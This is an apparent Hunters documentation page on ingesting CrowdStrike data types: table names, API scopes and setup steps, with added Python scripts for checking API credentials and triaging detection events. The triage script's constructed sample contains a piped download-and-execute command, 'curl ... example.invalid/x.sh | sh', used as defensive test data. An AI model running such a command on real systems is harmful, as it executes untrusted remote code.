Connect this data source on your own, using the Hunters platform.
TL;DR
Supported data types | 3rd party detection | Hunters detection | IOC search | Search | Table name | Log format | Collection method
---|---|---|---|---|---|---|---
CrowdStrike Raw Events | ✅ | ✅ | ✅ | | crowdstrike_raw_events | NDJSON | CrowdStrike Store
CrowdStrike Detections | ✅ | ✅ | | | crowdstrike_detects | NDJSON | CrowdStrike Store
CrowdStrike Devices | ✅ | ✅ | | | crowdstrike_devices | NDJSON | CrowdStrike Store
CrowdStrike Incidents | ✅ | | | | crowdstrike_incidents | NDJSON | CrowdStrike Store
CrowdStrike Identity Based Alerts | ✅ | ✅ | | | crowdstrike_idp | NDJSON | API
CrowdStrike Mobile | ✅ | ✅ | | | crowdstrike_mobile | NDJSON | API
CrowdStrike Spotlight | ✅ | | | | crowdstrike_spotlight | NDJSON | API
CrowdStrike Indicators | ✅ | | | | crowdstrike_indicators | NDJSON | API
CrowdStrike FileVantage | ✅ | ✅ | | | crowdstrike_filevantage_queries_changes | NDJSON | API
CrowdStrike Falcon Event Streams | ✅ | ✅ | ✅ | | crowdstrike_falcon_event_streams | NDJSON | CrowdStrike Store
CrowdStrike Alerts | ✅ | | | | crowdstrike_alerts | NDJSON | API
Overview
CrowdStrike is a cybersecurity company that provides endpoint security, threat intelligence, and cyber attack response services. Its flagship product, CrowdStrike Falcon, is a cloud-based endpoint protection platform that uses artificial intelligence and machine learning to detect and prevent cyber threats in real time.
📘 Note
The following modules are needed for data collection:
Detections - requires Insight module.
Spotlight - requires Spotlight module.
Raw telemetry - requires Falcon Data Replicator.
Supported data types
⚠️Attention
If several CrowdStrike customer IDs (CIDs) sit under one parent CID, set up a separate data flow for each child CID. Do not use the parent CID when configuring the connection on Hunters.
CrowdStrike Raw Events
Overview
Table name: crowdstrike_raw_events
CrowdStrike raw events represent the detailed data captured by the Falcon sensor installed on each endpoint. These events encompass a wide range of activities.
Send data to Hunters
Step 1: Connect Hunters to your CrowdStrike portal
- Log into the CrowdStrike Falcon portal.
- From the left-side menu, click CrowdStrike Store > All Apps.
- Look for the Hunters.AI tile and click to open it.
- Click Try it free.
📘 Note
Your CrowdStrike API token will be shared with Hunters with the following permissions:
- CrowdStrike Falcon raw data replicator
- CrowdStrike Detections API
You will receive an automated email from Hunters confirming this action. This is designed for new prospects who have not yet been introduced to Hunters.
- To retrieve your Customer ID, open the Falcon menu and navigate to Host setup and management > Sensor downloads.
- Copy your Customer ID and paste it into a safe place.
Step 2: Create a data source on Hunters
- Follow this procedure to connect CrowdStrike as a data source.
- Insert the Customer ID value from the previous section and click Apply.
The Customer ID field is case-sensitive.
Once done, Hunters will connect your CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.
CrowdStrike Detections
Overview
Table name: crowdstrike_detects
CrowdStrike detections are generated by analyzing events collected from endpoints across the network. These detections are based on a wide range of indicators and sophisticated analysis techniques, including machine learning, behavioral analysis, and threat intelligence. CrowdStrike's Falcon platform is known for its ability to detect a variety of threats, from malware and ransomware to more subtle indicators of attack (IOAs) and indicators of compromise (IOCs).
Send data to Hunters
Step 1 and Step 2 are identical to the CrowdStrike Store procedure described under CrowdStrike Raw Events above: open the Hunters.AI tile in CrowdStrike Store > All Apps, click Try it free, copy your Customer ID from Host setup and management > Sensor downloads, then create the CrowdStrike data source on Hunters with that Customer ID (the field is case-sensitive). A single Store connection delivers CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.
CrowdStrike Devices
Overview
Table name: crowdstrike_devices
CrowdStrike device logs encompass a wide range of data points collected from each endpoint or device within the network. These logs are crucial for monitoring the health and security status of the network, detecting potential threats, and facilitating forensic analysis in the event of a security incident.
Send data to Hunters
Step 1 and Step 2 are identical to the CrowdStrike Store procedure described under CrowdStrike Raw Events above: open the Hunters.AI tile in CrowdStrike Store > All Apps, click Try it free, copy your Customer ID from Host setup and management > Sensor downloads, then create the CrowdStrike data source on Hunters with that Customer ID (the field is case-sensitive). A single Store connection delivers CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.
CrowdStrike Incidents
Overview
Table name: crowdstrike_incidents
CrowdStrike Incidents are part of CrowdStrike Falcon's comprehensive suite of endpoint protection capabilities, focusing on identifying, managing, and resolving security threats across an organization's network. When the Falcon platform detects a series of related security events or behaviors that indicate a more significant issue or attack, it aggregates this information into an incident. This approach helps security teams prioritize and respond to the most critical threats more efficiently, ensuring that resources are focused where they are needed most.
Send data to Hunters
Step 1 and Step 2 are identical to the CrowdStrike Store procedure described under CrowdStrike Raw Events above: open the Hunters.AI tile in CrowdStrike Store > All Apps, click Try it free, copy your Customer ID from Host setup and management > Sensor downloads, then create the CrowdStrike data source on Hunters with that Customer ID (the field is case-sensitive). A single Store connection delivers CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents, CrowdStrike Falcon Event Streams and CrowdStrike Raw Events to your Hunters platform.
CrowdStrike Identity Based Alerts
Overview
Table name: crowdstrike_idp
CrowdStrike's identity-based alerts are part of its advanced threat detection capabilities, focusing on identifying security threats that specifically target or involve user identities and credentials. These alerts play a critical role in an organization's security posture by helping to prevent unauthorized access, insider threats, and identity-related attacks. With the increasing sophistication of cyber threats, particularly those involving credential theft, social engineering, and lateral movement within networks, identity-based security solutions have become essential.
Send data to Hunters
⚠️ Attention
The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).
Step 1: Create an API client
Create a CrowdStrike API client with the Alerts: Read scope and permissions (as specified here). Create a dedicated client for this integration and grant it only the scope listed; the client secret is displayed once, when the client is created, so record it in a secrets manager before leaving the page.
Step 2: Create a data source on Hunters
Complete the process on the Hunters platform, following this process, and supply the following keys:
- Client ID
- Client Secret
- Cloud Endpoint - the API hostname only, without the https:// prefix, for example api.crowdstrike.com. Use the hostname of the Falcon cloud your tenant is in: api.crowdstrike.com is the US-1 cloud, and US-2, EU-1 and GovCloud tenants have their own API hostnames.
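Before the Client ID, Client Secret and Cloud Endpoint are entered on Hunters, it is worth confirming locally that the endpoint value is in the form the field expects and that the client can actually obtain a token and reach the API it was scoped for. The script below is an added example for this page, not Hunters' or CrowdStrike's own code. It assumes the Falcon OAuth2 token endpoint (POST https://<cloud>/oauth2/token, form-encoded, HTTP 201 on success) and the public Falcon API hostnames listed in KNOWN_CLOUDS; the read-only query paths in SCOPE_PROBES are this example's assumption about which API each Hunters data type needs and should be checked against the CrowdStrike API reference before relying on them.

```python
"""Preflight check for a CrowdStrike API client before it is handed to Hunters.

Added example for this page, not Hunters' or CrowdStrike's own code. Assumes the
Falcon OAuth2 token endpoint and the public Falcon API hostnames below; the
probe paths in SCOPE_PROBES are assumptions about which API each scope unlocks.
"""
import json
import os
import urllib.error
import urllib.parse
import urllib.request

# Public Falcon API hostnames by cloud (assumed list; confirm yours with CrowdStrike).
KNOWN_CLOUDS = {
    "us-1": "api.crowdstrike.com",
    "us-2": "api.us-2.crowdstrike.com",
    "eu-1": "api.eu-1.crowdstrike.com",
    "us-gov-1": "api.laggar.gcw.crowdstrike.com",
}

# One cheap GET per Hunters data type; an HTTP 403 here means the scope is missing.
SCOPE_PROBES = {
    "alerts (Alerts: Read)": "/alerts/queries/alerts/v2?limit=1",
    "spotlight (Vulnerabilities: read)":
        "/spotlight/queries/vulnerabilities/v1?limit=1&filter=status%3A%27open%27",
    "indicators (Indicators (Falcon Intelligence): read)": "/intel/queries/indicators/v1?limit=1",
    "filevantage (FileVantage: read)": "/filevantage/queries/changes/v2?limit=1",
}


def normalize_cloud_endpoint(value: str) -> str:
    """Return the bare hostname the Hunters 'Cloud Endpoint' field expects.

    Accepts a hostname, a full URL (scheme, path and port are dropped) or a
    cloud alias such as 'eu-1', and rejects anything that is not a known
    Falcon API hostname so a typo is caught before the data source is saved.
    """
    v = value.strip().lower()
    if v in KNOWN_CLOUDS:
        return KNOWN_CLOUDS[v]
    if "://" not in v:
        v = "https://" + v
    host = urllib.parse.urlsplit(v).hostname or ""
    if host not in KNOWN_CLOUDS.values():
        raise ValueError(f"not a Falcon API hostname: {value!r}")
    return host


def token_request(endpoint: str, client_id: str, client_secret: str) -> urllib.request.Request:
    """Build the client-credentials token request; the secret travels only in the POST body."""
    body = urllib.parse.urlencode(
        {"client_id": client_id, "client_secret": client_secret}
    ).encode()
    return urllib.request.Request(
        f"https://{endpoint}/oauth2/token",
        data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded",
                 "Accept": "application/json"},
        method="POST",
    )


def http_status(req: urllib.request.Request) -> tuple[int, bytes]:
    """Perform a request and return (status, body) instead of raising on 4xx/5xx."""
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as exc:
        return exc.code, exc.read()


def check_client(endpoint: str, client_id: str, client_secret: str) -> dict[str, int]:
    """Fetch a token, then probe each scoped API; returns {probe name: HTTP status}."""
    status, body = http_status(token_request(endpoint, client_id, client_secret))
    if status != 201:
        raise RuntimeError(f"token request failed with HTTP {status}: {body[:200]!r}")
    token = json.loads(body)["access_token"]
    results = {}
    for name, path in SCOPE_PROBES.items():
        req = urllib.request.Request(f"https://{endpoint}{path}",
                                     headers={"Authorization": f"Bearer {token}"})
        results[name], _ = http_status(req)
    return results


if __name__ == "__main__":
    # Credentials come from the environment so they never land in shell history.
    endpoint = normalize_cloud_endpoint(os.environ.get("FALCON_CLOUD", "api.crowdstrike.com"))
    client_id, secret = os.environ["FALCON_CLIENT_ID"], os.environ["FALCON_CLIENT_SECRET"]
    for name, code in check_client(endpoint, client_id, secret).items():
        verdict = "ok" if code == 200 else "scope missing" if code == 403 else f"HTTP {code}"
        print(f"{name:<55} {verdict}")
```

Run it with FALCON_CLOUD, FALCON_CLIENT_ID and FALCON_CLIENT_SECRET set; every probe you care about should print ok, and a scope missing line tells you which scope to add in the Falcon console before the client is entered on Hunters. Only the token and probe calls need network access; normalizing the endpoint and building the request work offline.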
CrowdStrike Mobile
Overview
Table name: crowdstrike_mobile
Mobile logs in CrowdStrike encompass detailed records of activities, events, and security incidents on mobile devices that are protected by the CrowdStrike Falcon platform. These logs are crucial for monitoring the security posture of mobile devices, investigating incidents, and ensuring compliance with organizational security policies.
Send data to Hunters
⚠️ Attention
The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).
Step 1: Create an API client
Create a CrowdStrike API client with the Alerts: Read scope and permissions (as specified here).
Step 2: Create a data source on Hunters
Complete the process on the Hunters platform, following this process, and supply the following keys:
- Client ID
- Client Secret
- Cloud Endpoint - the API hostname only, without the https:// prefix, for example api.crowdstrike.com.
CrowdStrike Spotlight
Overview
Table name: crowdstrike_spotlight
Spotlight logs contain detailed information about detected vulnerabilities in an organization's endpoints. These logs are essential for tracking, managing, and mitigating vulnerabilities effectively. The data includes specifics about each vulnerability, such as its severity, the affected software or system component, and recommendations for remediation.
Send data to Hunters
⚠️ Attention
The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).
Step 1: Create an API client
Create a CrowdStrike API client with the Vulnerabilities: read scope and permissions (as specified here).
Step 2: Create a data source on Hunters
Complete the process on the Hunters platform, following this process, and supply the following keys:
- Client ID
- Client Secret
- Cloud Endpoint - the API hostname only, without the https:// prefix, for example api.crowdstrike.com.
CrowdStrike Indicators
Overview
Table name: crowdstrike_indicators
CrowdStrike Indicators are the Falcon Intelligence threat-intelligence indicators: indicators of compromise such as file hashes, domains, IP addresses and URLs, each published with its malicious-confidence rating and the threat actors and malware families it is associated with. Ingesting this feed lets Hunters match your own telemetry against CrowdStrike's intelligence; it is read with the INDICATORS (FALCON INTELLIGENCE): read scope.
Send data to Hunters
⚠️ Attention
The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).
Step 1: Create an API client
Create a CrowdStrike API client with the INDICATORS (FALCON INTELLIGENCE): read scope and permissions (as specified here).
Step 2: Create a data source on Hunters
Complete the process on the Hunters platform, following this process, and supply the following keys:
- Client ID
- Client Secret
- Cloud Endpoint - the API hostname only, without the https:// prefix, for example api.crowdstrike.com.
CrowdStrike FileVantage
Overview
Table name: crowdstrike_filevantage_queries_changes
FileVantage is CrowdStrike's file integrity monitoring (FIM) module. It records changes to files and directories (and, on Windows, registry keys) under monitored paths, including which user and process made the change and when, so that tampering with configuration files, binaries or audit settings can be detected and FIM compliance requirements can be met. The crowdstrike_filevantage_queries_changes table holds these change records.
Send data to Hunters
⚠️ Attention
The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).
Step 1: Create an API client
Create a CrowdStrike API client with the FILEVANTAGE: read scope and permissions (as specified here).
Step 2: Create a data source on Hunters
Complete the process on the Hunters platform, following this process, and supply the following keys:
- Client ID
- Client Secret
- Cloud Endpoint - the API hostname only, without the https:// prefix, for example api.crowdstrike.com.
CrowdStrike Falcon Event Streams
Overview
Table name: crowdstrike_falcon_event_streams
CrowdStrike Falcon Event Streams deliver, in near real time, the events the Falcon platform emits about its own activity: detection summaries, incident summaries, Falcon console user-activity and authentication audit events, and similar. They are the right source for acting on what Falcon has detected as it happens. They do not carry the per-process, network and file telemetry recorded by the sensor; that arrives through Falcon Data Replicator as CrowdStrike Raw Events. The sample under Expected format below is a detection summary event.
Send data to Hunters
If you already have CrowdStrike connected
- On the Hunters platform, navigate to Data > Data sources.
- Click + Add data sources to view a list of your connected data sources.
- Locate CrowdStrike and click Edit Connection.
- Make sure the CROWDSTRIKE API tab is selected.
- Scroll down to the Data Types section and activate the CrowdStrike Falcon Event Streams data source.
- Click Test Connection and, once the test is successful, click Apply.
If this is your first time connecting CrowdStrike
Follow the CrowdStrike Store procedure described under CrowdStrike Raw Events above: open the Hunters.AI tile in CrowdStrike Store > All Apps, click Try it free, copy your Customer ID from Host setup and management > Sensor downloads, then create the CrowdStrike data source on Hunters with that Customer ID (the field is case-sensitive). That single connection delivers CrowdStrike Falcon Event Streams together with CrowdStrike Detections, CrowdStrike Devices, CrowdStrike Incidents and CrowdStrike Raw Events.
Expected format (one detection summary event; delivered as one JSON object per NDJSON line)
{
"AgentId": "afwehw34h5a235h23h52",
"AggregateId": "aggind:afwehw34h5a235h23h52:577551784278489191",
"CommandLine": "/usr/sbin/systemsetup -setremotelogin on",
"CompositeId": "a872ad070d984dff884bf211fda3d2d3:ind:afwehw34h5a235h23h52:577551784277851241-41009-3969400",
"DataDomains": "Endpoint",
"Description": "A process triggered an informational severity custom rule.",
"FalconHostLink": "https://falcon.crowdstrike.com/activity-v2/detections/a872ad070d984dff884bf211fda3d2d3:ind:afwehw34h5a235h23h52:577551784277851241-41009-3969400?_cid=afwh35rw3h3hwh3",
"FileName": "systemsetup",
"FilePath": "/usr/sbin/systemsetup",
"FilesAccessed": [
{
"FileName": "systemsetup",
"FilePath": "/usr/sbin/",
"Timestamp": 1727004600
},
{
"FileName": "fawegweg",
"FilePath": "/dev/",
"Timestamp": 1727004600
},
{
"FileName": "pass",
"FilePath": "/private/etc/",
"Timestamp": 1727004600
},
{
"FileName": ".fawefgawaw",
"FilePath": "/private/var/root/",
"Timestamp": 1727004600
},
{
"FileName": "dtracehelper",
"FilePath": "/dev/",
"Timestamp": 1727004600
}
],
"GrandParentCommandLine": "/usr/sbin/cron",
"GrandParentImageFileName": "cron",
"GrandParentImageFilePath": "/usr/sbin/cron",
"HostGroups": "2b5993dc70a249b3956e31e4c936f599,c1d473c1c8d546ea87c35f4c02bdf0b2,e452e9983a9f4939abd3e9612b1480ba",
"Hostname": "ASDHA4356HSWE",
"IOARuleGroupName": "macOS Custom Detections",
"IOARuleInstanceID": "73",
"IOARuleInstanceVersion": 3,
"IOARuleName": "Remote services. Remote login enabled",
"LocalIP": "169.254.254.200",
"LocalIPv6": "",
"LogonDomain": "",
"MACAddress": "aa-bb-cc-dd-ee-df",
"MD5String": "bc91819b3a077dca8ba4054f1c8562ca",
"Name": "Suspicious Activity",
"Objective": "Falcon Detection Method",
"ParentCommandLine": "/bin/sh -c /usr/sbin/systemsetup -setremotelogin on &> /dev/null",
"ParentImageFileName": "bash",
"ParentImageFilePath": "/bin/bash",
"ParentProcessId": 577551784277851239,
"PatternDispositionDescription": "Detection, standard detection.",
"PatternDispositionFlags": {
"BlockingUnsupportedOrDisabled": false,
"BootupSafeguardEnabled": false,
"CriticalProcessDisabled": false,
"Detect": false,
"FsOperationBlocked": false,
"HandleOperationDowngraded": false,
"InddetMask": false,
"Indicator": false,
"KillActionFailed": false,
"KillParent": false,
"KillProcess": false,
"KillSubProcess": false,
"OperationBlocked": false,
"PolicyDisabled": false,
"ProcessBlocked": false,
"QuarantineFile": false,
"QuarantineMachine": false,
"RegistryOperationBlocked": false,
"Rooting": false,
"SensorOnly": false,
"SuspendParent": false,
"SuspendProcess": false
},
"PatternDispositionValue": 0,
"PatternId": 41009,
"ProcessEndTime": 0,
"ProcessId": 577551784277851241,
"ProcessStartTime": 1727004600,
"SHA1String": "0000000000000000000000000000000000000000",
"SHA256String": "0467c233807480601368edac622e93c060ef7b3fcd444c0786956a7f1facb505",
"Severity": 10,
"SeverityName": "Informational",
"SourceProducts": "Falcon Insight",
"SourceVendors": "CrowdStrike",
"Tactic": "Custom Intelligence",
"Technique": "Indicator of Attack",
"Type": "ldt",
"UserName": "root"
}
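Two things a practitioner wants from an event of this shape are easy to get wrong: whether the sensor actually did anything (PatternDispositionFlags, not the human-readable Description, is the record of that) and which customer ID the event belongs to (the CompositeId begins with the CID, which is what the multi-CID attention note earlier on this page is about). The script below is an added example for this page, not Hunters' or CrowdStrike's own code. It parses NDJSON events using only field names present in the sample above; the list of prevention flags, the sensitive-path prefixes and the expected CID are assumptions made for the demonstration, and the two sample lines are constructed (the first is the page's event reduced to the fields used, the second is invented to exercise the mismatch and prevention branches).

```python
"""Triage CrowdStrike detection events in the NDJSON shape shown on this page.

Added example, not Hunters' or CrowdStrike's own code. Field names follow the
sample event; PREVENTION_FLAGS, SENSITIVE_PREFIXES and the expected CID are
assumptions for the demonstration. SAMPLE_NDJSON is constructed.
"""
import json
from datetime import datetime, timezone

# Disposition flags that mean the sensor acted, rather than only reporting (assumed set).
PREVENTION_FLAGS = (
    "KillProcess", "KillSubProcess", "KillParent", "SuspendProcess", "SuspendParent",
    "QuarantineFile", "QuarantineMachine", "ProcessBlocked", "OperationBlocked",
    "FsOperationBlocked", "RegistryOperationBlocked",
)
# Paths worth surfacing when they appear in FilesAccessed on macOS/Linux (assumed list).
SENSITIVE_PREFIXES = ("/private/etc/", "/etc/", "/private/var/root/", "/root/")

# Constructed sample: line 1 is the page's event trimmed to the fields used here,
# line 2 is invented (different CID, sensor killed the process).
SAMPLE_NDJSON = """\
{"AgentId":"afwehw34h5a235h23h52","CompositeId":"a872ad070d984dff884bf211fda3d2d3:ind:afwehw34h5a235h23h52:577551784277851241-41009-3969400","CommandLine":"/usr/sbin/systemsetup -setremotelogin on","ParentCommandLine":"/bin/sh -c /usr/sbin/systemsetup -setremotelogin on &> /dev/null","GrandParentCommandLine":"/usr/sbin/cron","Hostname":"ASDHA4356HSWE","UserName":"root","Severity":10,"SeverityName":"Informational","IOARuleName":"Remote services. Remote login enabled","ProcessStartTime":1727004600,"PatternDispositionValue":0,"PatternDispositionFlags":{"Detect":false,"KillProcess":false,"QuarantineFile":false},"FilesAccessed":[{"FileName":"pass","FilePath":"/private/etc/","Timestamp":1727004600},{"FileName":"dtracehelper","FilePath":"/dev/","Timestamp":1727004600}]}
{"AgentId":"00000000000000000000deadbeef0000","CompositeId":"ffffffffffffffffffffffffffffffff:ind:00000000000000000000deadbeef0000:1-2-3","CommandLine":"curl -fsSL http://example.invalid/x.sh | sh","ParentCommandLine":"/bin/bash","GrandParentCommandLine":"/usr/bin/login","Hostname":"OTHER-TENANT-HOST","UserName":"svc","Severity":70,"SeverityName":"High","IOARuleName":"Piped download","ProcessStartTime":1727004660,"PatternDispositionFlags":{"Detect":false,"KillProcess":true,"QuarantineFile":false},"FilesAccessed":[]}
"""


def parse_ndjson(text: str):
    """Yield one event dict per non-empty line; a malformed line fails with its line number."""
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError as exc:
            raise ValueError(f"NDJSON line {lineno}: {exc}") from None


def cid_of(event: dict) -> str:
    """The customer ID is the first ':'-separated part of CompositeId ('<cid>:ind:<aid>:...')."""
    return event["CompositeId"].split(":", 1)[0]


def prevented(event: dict) -> bool:
    """True when any prevention flag is set, i.e. the sensor blocked, killed or quarantined."""
    flags = event.get("PatternDispositionFlags", {})
    return any(flags.get(name) for name in PREVENTION_FLAGS)


def sensitive_files(event: dict) -> list[str]:
    """Full paths from FilesAccessed that fall under SENSITIVE_PREFIXES."""
    return [fa["FilePath"] + fa["FileName"]
            for fa in event.get("FilesAccessed", [])
            if fa.get("FilePath", "").startswith(SENSITIVE_PREFIXES)]


def triage(event: dict, expected_cid: str) -> dict:
    """Reduce one event to the fields an analyst reads first."""
    chain = (event.get("GrandParentCommandLine"), event.get("ParentCommandLine"),
             event["CommandLine"])
    return {
        "composite_id": event["CompositeId"],
        "host": event["Hostname"],
        "user": event["UserName"],
        "severity": event["SeverityName"],
        "rule": event.get("IOARuleName") or event.get("Name"),
        "started": datetime.fromtimestamp(event["ProcessStartTime"], timezone.utc).isoformat(),
        "ancestry": " -> ".join(c for c in chain if c),
        "prevented": prevented(event),
        "sensitive_files": sensitive_files(event),
        # Flags events that arrived under the wrong CID (see the multi-CID note on this page).
        "cid_mismatch": cid_of(event) != expected_cid,
    }


def triage_all(text: str, expected_cid: str) -> list[dict]:
    """Triage every event in an NDJSON document."""
    return [triage(event, expected_cid) for event in parse_ndjson(text)]


if __name__ == "__main__":
    for row in triage_all(SAMPLE_NDJSON, "a872ad070d984dff884bf211fda3d2d3"):
        print(json.dumps(row, indent=2))
```

For the page's own event the output shows a detect-only disposition (no prevention flag set, so the remote-login change went through), an ancestry of cron to sh to systemsetup, and an access to /private/etc/pass worth a look; the constructed second line shows the other branches, a prevented process and an event whose CID is not the one the data source was configured for.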
CrowdStrike Alerts
Overview
Table name: crowdstrike_alerts
The CrowdStrike Alerts API provides programmatic access to security alerts generated by the Falcon platform. It allows users to retrieve, filter, and manage alert data across their environment, enabling seamless integration with SIEMs, SOAR platforms, or custom security workflows. With this API, organizations can automate incident response, monitor real-time threats, and enhance visibility into potential security incidents, all while maintaining tight control over alert data.
Send data to Hunters
⚠️ Attention
The process below requires you to select the CrowdStrike API tile (and not CrowdStrike).
Step 1: Create an API client
Create a CrowdStrike API client with the Alerts: Read scope and permissions (as specified here).
Step 2: Create a data source on Hunters
Complete the process on the Hunters platform, following this process, and supply the following keys:
- Client ID
- Client Secret
- Cloud Endpoint - the API hostname only, without the https:// prefix, for example api.crowdstrike.com.